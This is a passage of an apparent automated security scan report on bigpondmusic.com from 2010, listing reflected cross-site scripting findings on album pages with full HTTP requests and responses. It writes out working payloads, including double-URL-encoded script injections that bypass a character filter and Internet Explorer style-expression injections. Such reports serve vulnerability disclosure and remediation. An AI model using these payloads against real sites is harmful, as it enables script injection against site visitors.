p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87914


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc8e4f"><script>alert(1)</script>35d45e20369/rihanna/loud6" />
...[SNIP]...

2.131. http://bigpondmusic.com/album/rihanna/loud6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8987c'%3b2e62406d5a3 was submitted in the REST URL parameter 1. This input was echoed as 8987c';2e62406d5a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album8987c'%3b2e62406d5a3/rihanna/loud6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87974


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album8987c';2e62406d5a3';
   s.prop4 = 'rihanna';
   s.prop5 = 'loud6';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.c
...[SNIP]...

2.132. http://bigpondmusic.com/album/rihanna/loud6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/loud6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4eb56"style="x:expression(alert(1))"b49ea62020f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/loud6?4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 117450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Loud - BigPond Mus
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/loud6?4eb56"style="x:expression(alert(1))"b49ea62020f=1" />
...[SNIP]...

2.133. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac was submitted in the REST URL parameter 1. This input was echoed as 16411"><script>alert(1)</script>6c9e03e38ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac/rihanna/only-girl-in-the-world HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album16411"><script>alert(1)</script>6c9e03e38ac/rihanna/only-girl-in-the-world" />
...[SNIP]...

2.134. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae660'%3b66a4ff2fd7f was submitted in the REST URL parameter 1. This input was echoed as ae660';66a4ff2fd7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumae660'%3b66a4ff2fd7f/rihanna/only-girl-in-the-world HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87914


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumae660';66a4ff2fd7f';
   s.prop4 = 'rihanna';
   s.prop5 = 'only-girl-in-the-world';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.
...[SNIP]...

2.135. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77629"style%3d"x%3aexpression(alert(1))"90366360b68 was submitted in the h parameter. This input was echoed as 77629"style="x:expression(alert(1))"90366360b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/only-girl-in-the-world?h=73335586477629"style%3d"x%3aexpression(alert(1))"90366360b68 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Only Girl (In The
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?h=73335586477629"style="x:expression(alert(1))"90366360b68" />
...[SNIP]...

2.136. http://bigpondmusic.com/album/rihanna/only-girl-in-the-world [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/rihanna/only-girl-in-the-world

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c081b"style="x:expression(alert(1))"d068e88c9dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/rihanna/only-girl-in-the-world?c081b"style%3d"x%3aexpression(alert(1))"d068e88c9dc=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103894


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Rihanna - Only Girl (In The
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/rihanna/only-girl-in-the-world?c081b"style="x:expression(alert(1))"d068e88c9dc=1" />
...[SNIP]...

2.137. http://bigpondmusic.com/album/susan-boyle/the-gift11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c46a2'%3b0a91471649d was submitted in the REST URL parameter 1. This input was echoed as c46a2';0a91471649d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc46a2'%3b0a91471649d/susan-boyle/the-gift11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88329


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc46a2';0a91471649d';
   s.prop4 = 'susan-boyle';
   s.prop5 = 'the-gift11';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.138. http://bigpondmusic.com/album/susan-boyle/the-gift11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742 was submitted in the REST URL parameter 1. This input was echoed as 178a7"><script>alert(1)</script>e9a6fc79742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album178a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee9a6fc79742/susan-boyle/the-gift11 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88010


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album178a7"><script>alert(1)</script>e9a6fc79742/susan-boyle/the-gift11" />
...[SNIP]...

2.139. http://bigpondmusic.com/album/susan-boyle/the-gift11 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/susan-boyle/the-gift11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a090"style%3d"x%3aexpression(alert(1))"a680221f896 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a090"style="x:expression(alert(1))"a680221f896 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/susan-boyle/the-gift11?5a090"style%3d"x%3aexpression(alert(1))"a680221f896=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111091


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Susan Boyle - The Gift - Big
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/susan-boyle/the-gift11?5a090"style="x:expression(alert(1))"a680221f896=1" />
...[SNIP]...

2.140. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219 was submitted in the REST URL parameter 1. This input was echoed as 602e6"><script>alert(1)</script>7eadba08219 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album602e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7eadba08219/taio-cruz/rokstarr2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88103


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album602e6"><script>alert(1)</script>7eadba08219/taio-cruz/rokstarr2" />
...[SNIP]...

2.141. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71002'%3bb52b77c9e1e was submitted in the REST URL parameter 1. This input was echoed as 71002';b52b77c9e1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album71002'%3bb52b77c9e1e/taio-cruz/rokstarr2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87821


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album71002';b52b77c9e1e';
   s.prop4 = 'taio-cruz';
   s.prop5 = 'rokstarr2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.142. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 was submitted in the h parameter. This input was echoed as 57c97"style="x:expression(alert(1))"d7b1258e9f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

